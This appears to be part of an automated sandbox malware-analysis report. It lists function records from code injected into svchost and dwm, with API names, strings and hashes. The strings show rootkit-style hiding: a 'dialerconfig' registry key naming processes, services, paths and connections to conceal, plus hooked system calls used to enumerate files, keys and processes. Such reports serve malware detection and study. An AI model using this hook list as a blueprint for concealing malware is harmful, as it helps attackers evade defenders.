                                                                                • Snapshot File: hcaresult_30_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367280331.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367280331.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                • String ID:
                                                                                • API String ID: 2718003287-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode
                                                                                • String ID:
                                                                                • API String ID: 953036326-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
                                                                                • API String ID: 2933794660-0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367280331.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction ID: d9ae04a037fab9593d23b185716cfc6ae1853ea009b9f3fd067145c53b8789b8
                                                                                • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction Fuzzy Hash: 63116A36205F8482EB228F19F450399B7E2FB88B95F584221EE8C57B68DF3CC552CB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367280331.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: 9d65062051ba8b6632479c62e9aac4e80b8205db58c6d08c9f87c8cd4192a069
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: E9E08671640F44D4DF028F61E8502D833E1DB58B64F889122995C1A311FA3CD1E9C301
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367280331.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: 73069449200712f0ed9716194b398ac1fb7d2be99278163e9f3c6fe5041c0d1b
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: 23E08671600F44D4DF028F61E4501D873E1E758B54F889122D94C1A311EA3CD1E5C300
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction ID: c6ff0b059641438406dd073903249133c4bef50443ea073ae8eca436ca04cd8d
                                                                                • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction Fuzzy Hash: 96115135612F4881EB56DBEAE4146A977E2FB89FC0F184024DE4DA7B65DF38C452D340
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction ID: 2cb59b5cb5821d9a8e55ce1da8b0343498eb188679990e79d0fc3b99dd601316
                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction Fuzzy Hash: 63E09235601A0886EB058FE2D82838A36E2FB8DF06F04C024C90907751DF7D84DAC760

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction ID: 26355f59f2fbcf859f9fdb7bfac8618af794a1f004d759b0c7ff34932e116d24
                                                                                • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction Fuzzy Hash: 90710976711B5086EB149F6AE8A0ADD63A4F788B88F405161FF4E47B6DDF36C884C740

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID: wr
                                                                                • API String ID: 1092925422-2678910430
                                                                                • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction ID: 47b80caba1b0aab0240aea7a35e498d0921ec3c92e713c1e0b924a5b7fe9d153
                                                                                • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction Fuzzy Hash: 04115235706B91C2EF189F1AE4182E96260F74CB85F444065FF8907768EF3EC985C704

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 2a6939216e4066241bb7d33e143ff6fb32862c5ead5fedc71a002d9303c09c17
                                                                                • Instruction ID: 43c2d2febde26202f880cb7e5d5ddc55507ed27facd1cf01b654dc556421c9b1
                                                                                • Opcode Fuzzy Hash: 2a6939216e4066241bb7d33e143ff6fb32862c5ead5fedc71a002d9303c09c17
                                                                                • Instruction Fuzzy Hash: D5D17376609B8886DB649B0AE49439AB7A0F3CCB84F140156FF8D47BA9DF3DC581CB40

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: ab42e8011698989dde6dd516e0bf8dfd7e718f101fabf5710552cbfe92ec9bd4
                                                                                • Instruction ID: 2f876bf7158a6cc8c63e08690c226b7ead55a405f44d1cff1c0479b88e861e6f
                                                                                • Opcode Fuzzy Hash: ab42e8011698989dde6dd516e0bf8dfd7e718f101fabf5710552cbfe92ec9bd4
                                                                                • Instruction Fuzzy Hash: 6602B632619B8486EBA4CB59E49439AB7A1F3C9794F104055FF8E87BA8DF7DC484CB00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$AllocQuery
                                                                                • String ID:
                                                                                • API String ID: 31662377-0
                                                                                • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                • Instruction ID: 62f04f5f668187a0ae4209a96062c236bbf9041d91d4252b03df27feef77b1b0
                                                                                • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                • Instruction Fuzzy Hash: 4131BC3221AB8881EF689A19E0553DE66E4F38C784F500565BFCD46BACDB6FC5C08B44

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction ID: eb769cf37a89b3ef12196dc5b3cb94eded2092a35d1ffa07bd756d036b65c0b3
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: B511927161678086FF6C9F6AF8597D92294B75C344F5082A4FF16815BDEF7BC0C88204

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 3733156554-0
                                                                                • Opcode ID: 7a47e93f7e79f9067e4e2fc8604941f3a9ad20237d3497da51ea1a98359c40d4
                                                                                • Instruction ID: 72fb3dffb222cd1b70a4713ad25575b3f8e9ea29d6d58944361b524033167b4a
                                                                                • Opcode Fuzzy Hash: 7a47e93f7e79f9067e4e2fc8604941f3a9ad20237d3497da51ea1a98359c40d4
                                                                                • Instruction Fuzzy Hash: 36F0B736218B0480D7359B0AE4517DAABA0E38CBD4F145155BF8D47BADCA3EC6D18B40

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415177632.000001160C9E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160C9E0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160c9e0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: AllocLibraryLoadVirtual
                                                                                • String ID:
                                                                                • API String ID: 3550616410-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: 14d0a45b7d66c6113b95179a3941541b290b58f9ebcf81554cf017b6ede3d357
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: BB611372B01B9087EB58CF15D1407EDB3AAFB68BA4F589161EF590778CEA39D852C700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 000001160CA11628: GetProcessHeap.KERNEL32 ref: 000001160CA11633
                                                                                  • Part of subcall function 000001160CA11628: HeapAlloc.KERNEL32 ref: 000001160CA11642
                                                                                  • Part of subcall function 000001160CA11628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA116B2
                                                                                  • Part of subcall function 000001160CA11628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA116DF
                                                                                  • Part of subcall function 000001160CA11628: RegCloseKey.ADVAPI32 ref: 000001160CA116F9
                                                                                  • Part of subcall function 000001160CA11628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA11719
                                                                                  • Part of subcall function 000001160CA11628: RegCloseKey.ADVAPI32 ref: 000001160CA11734
                                                                                  • Part of subcall function 000001160CA11628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA11754
                                                                                  • Part of subcall function 000001160CA11628: RegCloseKey.ADVAPI32 ref: 000001160CA1176F
                                                                                  • Part of subcall function 000001160CA11628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA1178F
                                                                                  • Part of subcall function 000001160CA11628: RegCloseKey.ADVAPI32 ref: 000001160CA117AA
                                                                                  • Part of subcall function 000001160CA11628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA117CA
                                                                                • Sleep.KERNEL32 ref: 000001160CA11AD7
                                                                                • SleepEx.KERNELBASE ref: 000001160CA11ADD
                                                                                  • Part of subcall function 000001160CA11628: RegCloseKey.ADVAPI32 ref: 000001160CA117E5
                                                                                  • Part of subcall function 000001160CA11628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA11805
                                                                                  • Part of subcall function 000001160CA11628: RegCloseKey.ADVAPI32 ref: 000001160CA11820
                                                                                  • Part of subcall function 000001160CA11628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA11840
                                                                                  • Part of subcall function 000001160CA11628: RegCloseKey.ADVAPI32 ref: 000001160CA1185B
                                                                                  • Part of subcall function 000001160CA11628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA1187B
                                                                                  • Part of subcall function 000001160CA11628: RegCloseKey.ADVAPI32 ref: 000001160CA11896
                                                                                  • Part of subcall function 000001160CA11628: RegCloseKey.ADVAPI32 ref: 000001160CA118A0
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: def476aa2106e92d5e83f68997f758a87603729eedac3282fb672689b4480aed
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: A031E37120474581FF589B2ED6513ED63A6AB8CBD0F0855A1BF09876EDFE1AC9D1C210

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction ID: 26e0d04264bd1025ab8084d08883fea5ee137d09c7f6383246fa8a543dd74820
                                                                                • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction Fuzzy Hash: 70B16972220B9086EB6D8F29D4507E967A5FB88B94F445296FF0993799EF36CCC0C340
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction ID: f38edc99e1d2e9b9c73a0df7d4b367b2acc15f75f327f8aa4a1b2c45b403be39
                                                                                • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction Fuzzy Hash: 83318372205B808AEB649F65E8503ED73B0F788744F44406AEF4D57B98EF39CA88C710
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction ID: 5919553aac9d1a8d8787ae4c55b550eb79f0a7f4b7b5ddd794635620a42e0337
                                                                                • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction Fuzzy Hash: 98314936614B8086EB648F29E8903EE73A4F789758F500166FF9D43B99EF39C585CB00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction ID: 62386f3898b506f272a71971f8396644ea8b68a147205f6dc5b3694ce09630a9
                                                                                • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction Fuzzy Hash: F7513776205B9486EB58CF6AE4583DAB7A1F788F99F448124EF4A07718DF39D489CB00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction ID: d0e5114047ee53141e5c98024223ea41aaf4f9b0c9cd1fbc05652697f2aefcd5
                                                                                • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction Fuzzy Hash: 5C318274500B5AA0EB0CEB6EE8717D46321B74C344F905593BF094256EDE3AC6C9C350

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415177632.000001160C9E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160C9E0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160c9e0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 7cdc63451b69bc29292b48ce5e8b572541f10f68e69c8b9878c1adc1d1e47a85
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: BC81B2316403498AFA5CAB6594413D967A0FBBDB80F5984A9FB054779FFF3BC8868700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 000001160CA1CE37
                                                                                • FlsGetValue.KERNEL32(?,?,?,000001160CA20A6B,?,?,?,000001160CA2045C,?,?,?,000001160CA1C84F), ref: 000001160CA1CE4C
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CA20A6B,?,?,?,000001160CA2045C,?,?,?,000001160CA1C84F), ref: 000001160CA1CE6D
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CA20A6B,?,?,?,000001160CA2045C,?,?,?,000001160CA1C84F), ref: 000001160CA1CE9A
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CA20A6B,?,?,?,000001160CA2045C,?,?,?,000001160CA1C84F), ref: 000001160CA1CEAB
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CA20A6B,?,?,?,000001160CA2045C,?,?,?,000001160CA1C84F), ref: 000001160CA1CEBC
                                                                                • SetLastError.KERNEL32 ref: 000001160CA1CED7
                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001160CA20A6B,?,?,?,000001160CA2045C,?,?,?,000001160CA1C84F), ref: 000001160CA1CF0D
                                                                                • FlsSetValue.KERNEL32(?,?,00000001,000001160CA1ECCC,?,?,?,?,000001160CA1BF9F,?,?,?,?,?,000001160CA17AB0), ref: 000001160CA1CF2C
                                                                                  • Part of subcall function 000001160CA1D6CC: HeapAlloc.KERNEL32 ref: 000001160CA1D721
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CA20A6B,?,?,?,000001160CA2045C,?,?,?,000001160CA1C84F), ref: 000001160CA1CF54
                                                                                  • Part of subcall function 000001160CA1D744: HeapFree.KERNEL32 ref: 000001160CA1D75A
                                                                                  • Part of subcall function 000001160CA1D744: GetLastError.KERNEL32 ref: 000001160CA1D764
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CA20A6B,?,?,?,000001160CA2045C,?,?,?,000001160CA1C84F), ref: 000001160CA1CF65
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CA20A6B,?,?,?,000001160CA2045C,?,?,?,000001160CA1C84F), ref: 000001160CA1CF76
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
